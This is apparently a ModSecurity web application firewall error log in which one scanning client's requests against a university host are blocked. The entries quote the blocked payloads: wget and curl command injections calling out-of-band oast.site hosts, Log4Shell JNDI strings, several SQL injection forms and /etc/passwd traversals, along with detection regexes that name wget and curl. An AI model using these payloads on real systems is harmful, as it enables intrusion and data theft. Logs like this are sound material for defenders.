[Tue Aug 29 11:31:12.305148 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlguhufme5i1ny7p.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10kMCo-f0AAANjpz0AAAAT"]
[Tue Aug 29 11:31:13.302693 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlgrs8ump8t9gdcs.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQEGGUAAAAm"]
[Tue Aug 29 11:31:13.309566 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAP5mG8AAAAM"]
[Tue Aug 29 11:31:14.315949 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAPPS1UAAAAd"]
[Tue Aug 29 11:31:14.316584 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10ksCo-f0AAAQP65EAAAAx"]
[Tue Aug 29 11:31:15.346477 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10k8Co-f0AAAQUH@AAAAA2"]
[Tue Aug 29 11:31:15.360336 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAPMmHQAAAAY"]
[Tue Aug 29 11:31:16.634985 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAP@MxEAAAAZ"]
[Tue Aug 29 11:31:17.323677 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAQR438AAAAz"]
[Tue Aug 29 11:31:17.325211 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAPahxYAAAAL"]
[Tue Aug 29 11:31:17.368921 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAP6NM0AAAAQ"]
[Tue Aug 29 11:31:18.352073 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlg69xach3dne5th.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAOKNvkAAAAK"]
[Tue Aug 29 11:31:18.536272 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAQQykAAAAAy"]
[Tue Aug 29 11:31:20.339343 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAP6NNEAAAAQ"]
[Tue Aug 29 11:31:22.574595 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "repositoryfh.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAQR44gAAAAz"]
[Tue Aug 29 11:31:23.327933 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAPPS2UAAAAd"]
[Tue Aug 29 11:31:24.335233 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlgusy9bgyfztngq.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQFcRkAAAAn"]
[Tue Aug 29 11:31:25.302487 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlg3ggtnsneuc9gm.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQMrqcAAAAu"]
[Tue Aug 29 11:31:26.785387 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgh55h7jk533k8o.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAN@5FIAAAAO"]
[Tue Aug 29 11:31:27.459895 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAQR45YAAAAz"]
[Tue Aug 29 11:31:28.704428 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10oMCo-f0AAAP5mIsAAAAM"]
[Tue Aug 29 11:31:29.309103 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAPMmJIAAAAY"]
[Tue Aug 29 11:31:29.503205 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQOv2YAAAAw"]
[Tue Aug 29 11:31:29.579445 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQMrrYAAAAu"]
[Tue Aug 29 11:31:30.295276 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10osCo-f0AAAQNwGsAAAAv"]
[Tue Aug 29 11:31:30.371562 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAP5mJAAAAAM"]
[Tue Aug 29 11:31:31.325276 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgiop46om9fno9j.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAPahzkAAAAL"]
[Tue Aug 29 11:31:32.399237 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAPahz8AAAAL"]
[Tue Aug 29 11:31:33.503504 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlgcbs5k785mfyhi.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAQJWtsAAAAr"]
[Tue Aug 29 11:31:34.446074 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag 